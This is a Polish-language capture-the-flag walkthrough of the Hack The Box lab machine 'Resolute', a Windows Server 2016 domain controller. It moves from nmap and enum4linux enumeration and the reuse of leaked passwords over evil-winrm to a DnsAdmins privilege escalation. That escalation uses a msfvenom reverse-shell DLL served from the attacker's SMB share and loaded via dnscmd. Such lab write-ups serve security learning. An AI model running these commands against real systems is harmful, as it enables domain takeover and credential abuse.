Maszyna Resolute to przygotowany wcześniej środowisko do testów penetracyjnych przez zespół Hack the box .
Na pokładzie kontroler domeny z windows server 2016
Weryfikacje usług oraz potencjalnych portów zaczynamy od polecenia
Nmap -sC -sV -oA resolute 10.10.10.169
Nmap scan report for 10.10.10.169
Host is up (0.083s latency).
Not shown: 989 closed ports
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2021-04-08 08:07:17Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Default-First-Site-Name)
445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: MEGABANK)
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
Service Info: Host: RESOLUTE; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|clock-skew: mean: 2h26m29s, deviation: 4h02m31s, median: 6m28s | smb-os-discovery: | OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3) | Computer name: Resolute | NetBIOS computer name: RESOLUTE\x00 | Domain name: megabank.local | Forest name: megabank.local | FQDN: Resolute.megabank.local | System time: 2021-04-08T01:07:27-07:00
| smb-security-mode:
| account_used:
| authentication_level: user
| challenge_response: supported
|_ message_signing: required
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2021-04-08T08:07:25
|_ start_date: 2021-04-08T07:53:57
za pomocą protokołu win-rpc jesteśmy wstanie odpytać smb o potencjalnych użytkowników możemy to zrobić klientem RPC rpclient
https://www.willhackforsushi.com/sec504/SMB-Access-from-Linux.pdf lub za pomoca narzędzia wbudowanego w Kali Linuxa enum4linux https://tools.kali.org/information-gathering/enum4linux
Wynik
Posiadamy Politykę haseł organizacji oraz hasło użytkownika zapisane w ldapie 🙂 (takie sytuacje zdarzają się naprawdę )
Account: marko Name: Marko Novak Desc: Account created. Password set to Welcome123!
Password Policy Information for 10.10.10.169 |====================================================
[+] Attaching to 10.10.10.169 using a NULL share [+] Trying protocol 139/SMB…[+] Trying protocol 445/SMB… [+] Found domain(s):[!] Protocol failed: Cannot request session (Called Name:10.10.10.169)[+] Password Info for Domain: MEGABANK[+] MEGABANK [+] Builtin[+] Minimum password length: 7 [+] Password history length: 24 [+] Maximum password age: Not Set [+] Password Complexity Flags: 000000 [+] Domain Refuse Password Change: 0 [+] Domain Password Store Cleartext: 0 [+] Domain Password Lockout Admins: 0 [+] Domain Password No Clear Change: 0 [+] Domain Password No Anon Change: 0 [+] Domain Password Complex: 0 [+] Minimum password age: 1 day 4 minutes [+] Reset Account Lockout Counter: 30 minutes [+] Locked Account Duration: 30 minutes [+] Account Lockout Threshold: None [+] Forced Log off Time: Not SetUse of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 501.
[+] Retieved partial password policy with rpcclient:Password Complexity: Disabled
Minimum Password Length: 7
=============================
| Users on 10.10.10.169 |
=============================
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 866.
index: 0x10b0 RID: 0x19ca acb: 0x00000010 Account: abigail Name: (null) Desc: (null)
index: 0xfbc RID: 0x1f4 acb: 0x00000210 Account: Administrator Name: (null) Desc: Built-in account for administering the computer/domain
index: 0x10b4 RID: 0x19ce acb: 0x00000010 Account: angela Name: (null) Desc: (null)
index: 0x10bc RID: 0x19d6 acb: 0x00000010 Account: annette Name: (null) Desc: (null)
index: 0x10bd RID: 0x19d7 acb: 0x00000010 Account: annika Name: (null) Desc: (null)
index: 0x10b9 RID: 0x19d3 acb: 0x00000010 Account: claire Name: (null) Desc: (null)
index: 0x10bf RID: 0x19d9 acb: 0x00000010 Account: claude Name: (null) Desc: (null)
index: 0xfbe RID: 0x1f7 acb: 0x00000215 Account: DefaultAccount Name: (null) Desc: A user account managed by the system.
index: 0x10b5 RID: 0x19cf acb: 0x00000010 Account: felicia Name: (null) Desc: (null)
index: 0x10b3 RID: 0x19cd acb: 0x00000010 Account: fred Name: (null) Desc: (null)
index: 0xfbd RID: 0x1f5 acb: 0x00000215 Account: Guest Name: (null) Desc: Built-in account for guest access to the computer/domain
index: 0x10b6 RID: 0x19d0 acb: 0x00000010 Account: gustavo Name: (null) Desc: (null)
index: 0xff4 RID: 0x1f6 acb: 0x00000011 Account: krbtgt Name: (null) Desc: Key Distribution Center Service Account
index: 0x10b1 RID: 0x19cb acb: 0x00000010 Account: marcus Name: (null) Desc: (null)
index: 0x10a9 RID: 0x457 acb: 0x00000210 Account: marko Name: Marko Novak Desc: Account created. Password set to Welcome123!
index: 0x10c0 RID: 0x2775 acb: 0x00000010 Account: melanie Name: (null) Desc: (null)
index: 0x10c3 RID: 0x2778 acb: 0x00000010 Account: naoki Name: (null) Desc: (null)
index: 0x10ba RID: 0x19d4 acb: 0x00000010 Account: paulo Name: (null) Desc: (null)
index: 0x10be RID: 0x19d8 acb: 0x00000010 Account: per Name: (null) Desc: (null)
index: 0x10a3 RID: 0x451 acb: 0x00000210 Account: ryan Name: Ryan Bertrand Desc: (null)
index: 0x10b2 RID: 0x19cc acb: 0x00000010 Account: sally Name: (null) Desc: (null)
index: 0x10c2 RID: 0x2777 acb: 0x00000010 Account: simon Name: (null) Desc: (null)
index: 0x10bb RID: 0x19d5 acb: 0x00000010 Account: steve Name: (null) Desc: (null)
index: 0x10b8 RID: 0x19d2 acb: 0x00000010 Account: stevie Name: (null) Desc: (null)
index: 0x10af RID: 0x19c9 acb: 0x00000010 Account: sunita Name: (null) Desc: (null)
index: 0x10b7 RID: 0x19d1 acb: 0x00000010 Account: ulf Name: (null) Desc: (null)
index: 0x10c1 RID: 0x2776 acb: 0x00000010 Account: zach Name: (null) Desc: (null)
Mając login i hasło użytkownika Marko możemy za pomocą winrm zalogować się do serwera na konto użytkownika
Winrm jest protokołem do połączeń zdalnych konsoli w windowsie wbudowany w każdy komputer .
Na naszym linuksie piszemy
evil-winrm -i 10.10.10.169 -u melanie -p Welcome123!
Evil-WinRM shell v2.4
Info: Establishing connection to remote endpoint
Evil-WinRM PS C:\Users\melanie\Documents>
Co ciekawe katalog PSTRANSCRIPT znajduję sie w głównym katalogu i każdy ma do niego dostęp .
PSTRANSCRIPT to zrzut komend z powershella na stacji . Domyślnie każdy z nas ma go w folderze
%userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
Jeżeli jak w tym przypadku ktoś nie podejmie trudu i wpiszę jawnym tekstem hasło do powershella to jest to potencjalnie bardzo wrażliwy plik
Evil-WinRM* PS C:\PSTranscripts> cd 20191203
Evil-WinRM PS C:\PSTranscripts\20191203> ls
Evil-WinRM PS C:\PSTranscripts\20191203> ls -forceDirectory: C:\PSTranscripts\20191203Mode LastWriteTime Length Name
---- ------------- ------ ----
-arh-- 12/3/2019 6:45 AM 3732 PowerShell_transcript.RESOLUTE.OJuoBGhU.20191203063201.txtEvil-WinRM PS C:\PSTranscripts\20191203> cat PowerShell_transcript.RESOLUTE.OJuoBGhU.20191203063201.txt
Windows PowerShell transcript start
Start time: 20191203063201
Username: MEGABANK\ryan
RunAs User: MEGABANK\ryan
Machine: RESOLUTE (Microsoft Windows NT 10.0.14393.0)
Host Application: C:\Windows\system32\wsmprovhost.exe -Embedding
Process ID: 2800
PSVersion: 5.1.14393.2273
PSEdition: Desktop
PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.14393.2273
BuildVersion: 10.0.14393.2273
CLRVersion: 4.0.30319.42000
WSManStackVersion: 3.0
PSRemotingProtocolVersion: 2.3
SerializationVersion: 1.1.0.1
Command start time: 20191203063455
PS>TerminatingError(): "System error."
CommandInvocation(Invoke-Expression): "Invoke-Expression"
ParameterBinding(Invoke-Expression): name="Command"; value="-join($id,'PS ',$(whoami),'@',$env:computername,' ',$((gi $pwd).Name),'> ')
if (!$?) { if($LASTEXITCODE) { exit $LASTEXITCODE } else { exit 1 } }"
CommandInvocation(Out-String): "Out-String"
ParameterBinding(Out-String): name="Stream"; value="True"
Command start time: 20191203063455
PS>ParameterBinding(Out-String): name="InputObject"; value="PS megabank\ryan@RESOLUTE Documents> "
PS megabank\ryan@RESOLUTE Documents>
Command start time: 20191203063515
PS>CommandInvocation(Invoke-Expression): "Invoke-Expression"
ParameterBinding(Invoke-Expression): name="Command"; value="cmd /c net use X: \fs01\backups ryan Serv3r4Admin4cc123!
Złapaliśmy kolejnego gościa 🙂
Jak się okazuje ryan jest w grupie administratorów DNS
Możemy to sprawdzić za pomocą polecenie whoami /all
Evil-WinRM* PS C:\Users\ryan\Documents> whoami /all
USER INFORMATION
User Name SID
============= ==============================================
megabank\ryan S-1-5-21-1392959593-3013219662-3596683436-1105GROUP INFORMATION
Group Name Type SID Attributes
========================================== ================ ============================================== ===============================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
MEGABANK\Contractors Group S-1-5-21-1392959593-3013219662-3596683436-1103 Mandatory group, Enabled by default, Enabled group
MEGABANK\DnsAdmins Alias S-1-5-21-1392959593-3013219662-3596683436-1101 Mandatory group, Enabled by default, Enabled group, Local Group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level Label S-1-16-8192PRIVILEGES INFORMATION
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set EnabledUSER CLAIMS INFORMATION
User claims unknown.
Kerberos support for Dynamic Access Control on this device has been disabled.
No dobra ale co może zrobić gość będący w grupie DNS admin. Może np wyłączyć dns i włączyć go z nowa konfiguracją która pozwoli nam na przejęcie serwera 🙂
najpierw przygotujemy plik za pomocą którego oszukamy system do tego posłużyć nam msfvenom
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.16 LPORT=4444 --platform=windows -f dll > exploit.dll
Plik ten wystawimy na naszym SMB do tego użyjemy polecenia
python3 /usr/share/doc/python3-impacket/examples/smbserver.py SHARE /root/HTB/Boxes/Resolute
Następnie uruchomimy Netstat na porcie 4444 🙂
polecenie
nc -lvnp 4444
Na koncie administratora DNS uruchamiamy polecenie
dnscmd.exe /config /serverlevelplugindll \\10.10.14.16\SHARE\exploit.dll
a następnie polecenie
sc stop dns
sc start dns
i za pomocą reverse shell mamy konto systemowe nt/authority
Opis działania podnoszenia uprawnień za pomocą dnscmd :
https://www.abhizer.com/windows-privilege-escalation-dnsadmin-to-domaincontroller/
